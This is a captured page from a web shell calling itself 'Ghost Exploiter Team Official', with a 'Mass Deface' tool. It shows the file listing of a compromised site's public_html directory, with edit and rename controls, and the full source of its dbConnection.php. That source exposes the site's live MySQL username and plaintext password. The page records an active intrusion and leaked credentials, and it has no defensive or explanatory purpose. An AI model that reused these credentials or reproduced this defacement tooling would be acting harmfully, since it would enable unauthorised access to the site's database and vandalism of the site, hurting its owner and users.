Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home2
/
ajwaeing
/
public_html
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.well-known
--
ren
ClinicTemplate_files
--
ren
administrator
--
ren
bootstrap
--
ren
css
--
ren
fonts
--
ren
images
--
ren
js
--
ren
kcfinder
--
ren
contents.php
2.534KB
edt
ren
dbConnection.php
1.073KB
edt
ren
error_log
7.518KB
edt
ren
fincludes.php
0.753KB
edt
ren
footer.php
2.343KB
header.php
5.672KB
edt
ren
our-team.php
3.184KB
edt
ren
why-us.php
2.235KB
edt
ren
<?php class dbConnection { private $host = "localhost"; private $user = "ajwaeing_ajwa"; private $pwd = 'MMvzpY%9QFMx-X3kvd'; private $database = "ajwaeing_ajwa"; private $link; private $result; private $sql; private $conn; function __construct() { $this->conn = mysqli_connect($this->host, $this->user, $this->pwd, $this->database); return $this->link; } function query($sql) { if(!empty($sql)) { global $mysql; $this->sql = $sql; $mysql = mysqli_query($this->conn, $this->sql); return $mysql; } else { return false; } } function rows($res) { return mysqli_num_rows($res); } function fetch($res) { return mysqli_fetch_array($res); } function fetchobj($res) { return mysqli_fetch_object($res); } function effected($res) { return mysqli_affected_rows($res); } function clean($data) { return mysqli_real_escape_string($this->conn, $data); } function getid() { return mysqli_insert_id($this -> conn); } /*function __destruct() { mysql_close($this->link); }*/ } ?>